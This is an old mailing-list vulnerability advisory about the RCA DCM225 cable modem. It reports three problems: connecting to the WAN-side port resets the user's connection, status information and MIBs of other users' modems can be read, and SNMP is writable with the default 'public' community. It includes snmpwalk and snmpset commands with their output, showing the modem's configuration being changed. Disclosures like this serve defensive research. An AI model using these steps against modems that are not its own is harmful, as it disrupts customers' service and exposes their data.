RCA cable modem Deny of Service

From: Gabriel A. Maggiotti (gmaggiotat_private)
Date: Tue Mar 26 2002 - 17:27:00 PST

    Web:  http://qb0x.net      			Author: Gabriel A. Maggiotti
    Date: March 26, 2002       	        	E-mail: gmaggiotat_private

    General Info
    ------------
    Problem Type    :  deny of service, misconfiguration and leak of information
    Vendor          :  www.rca.com
    Product         :  RCA cablemodems
    Model           :  DCM225 (perhaps others)
    Scope           :  Remote
    Risk            :  High

    The RCA Digital Cable Modem serves  as a two-way high-speed bridge between your
    personal computer and a cable  Internet Service Provider (ISP). i   It converts
    information that originates  from the Internet or your computer into electronic
    messages that can be transported over the same wires your cable company uses to
     transport video signals.

    Problem:
    -------

    1-  Deny of Service:

            The RCA cable modem has two devices, the one for local connection is 192
    .168.100.1 . This device is used  for information  request about the status  of
    the cable. The other device is 10.x.x.x and gives the same information.
            If you   connect to the second device  (10.x.x.x) on port 80,  RCA cable
    modem reset the user connection with inet. I proved it with my own wan ip 10.1.1
    .x and with other  cablemodem users  IP's in the same wan.   All of  them  reset
     when I remotly  connect to port 80 of the cablemodems.

    2-  Leak of Information:
         I can connect to the wan IP 10.x.x.x of any cablemodem user in my node,
    and take a look at the users cablemodem status information such as:

            USB: Inactive
            Ethernet: 100
            BaseT
            MAC Address:  00 10 95 0a 05 62
            User: Active
            Signal Acquired at 573 MHz
            SNR: 36.0 dB
            Received Signal Strength: -4.0 dBmV
            Micro-Reflections: 20 dBc
            Connection: Acquired
            Frequency: 37 MHz
            Power Level: 44.0 dBmV
            Channel ID: 4
            Number of user conected: 1

    I can dump user cablemodem MIB's too.

            I can search in MIB table looking for my node server. I know that  the
    node IP start with 10.x.x.x and I started to search in the MIB  Ops, a found
    it!

    69.1.4.2.0 = IpAddress: 10.20.250.1
    69.1.4.3.0 = IpAddress: 10.20.250.1
    69.1.4.4.0 = IpAddress: 10.20.250.1
    69.1.4.5.0 = "docsis_light_avalos"

            And then I recognize the word "avalos" becouse is the name of the street
    where the node fisicaly is.

    3-  Misconfiguration cause you can write my own MIB table. Take a look:

    <quote>
    [gabi@pluto gabi]$ snmpwalk 192.168.100.1 public

    system.sysDescr.0 = RCA DCM225 Cable Modem serial no. 65731049496572,
    HW_Version 025 (03.1), SW_Version ST05.14.00, Bootloader_Ver 11.1, OS: PSOS
    2.5.0
    system.sysObjectID.0 = OID: enterprises.2863.225.25.5.20.0
    system.sysUpTime.0 = Timeticks: (141857) 0:23:38.57
    system.sysContact.0 = unassigned sysContact
    system.sysName.0 =
    system.sysLocation.0 =
    system.sysServices.0 = 79

    [gabi@pluto gabi]$ snmpset 192.168.100.1 public system.sysName.0 s lame
    system.sysName.0 = lame

    [gabi@pluto gabi]$ snmpset 192.168.100.1 public system.sysLocation.0 s
    lame_cyty
    system.sysName.0 = lame_city

    [gabi@pluto gabi]$ snmpwalk 192.168.100.1 public

    system.sysDescr.0 = RCA DCM225 Cable Modem serial no. 65731049496572,
    HW_Version 025 (03.1), SW_Version ST05.14.00, Bootloader_Ver 11.1, OS: PSOS
    2.5.0
    system.sysObjectID.0 = OID: enterprises.2863.225.25.5.20.0
    system.sysUpTime.0 = Timeticks: (161396) 0:26:53.96
    system.sysContact.0 = unassigned sysContact
    system.sysName.0 = lame
    system.sysLocation.0 = lame_city
    system.sysServices.0 = 79
    </quote>

    research-listat_private is dedicated to interactively researching vulnerab-
    ilities, report potential or undeveloped holes in any kind of computer system.
    To  subscribe to   research-listat_private t send a blank  email  to
    research-list-subscribeat_private More help  available  sending an email
    to research-list-helpat_private
    Note: the list doesn't allow html, it will be stripped from messages.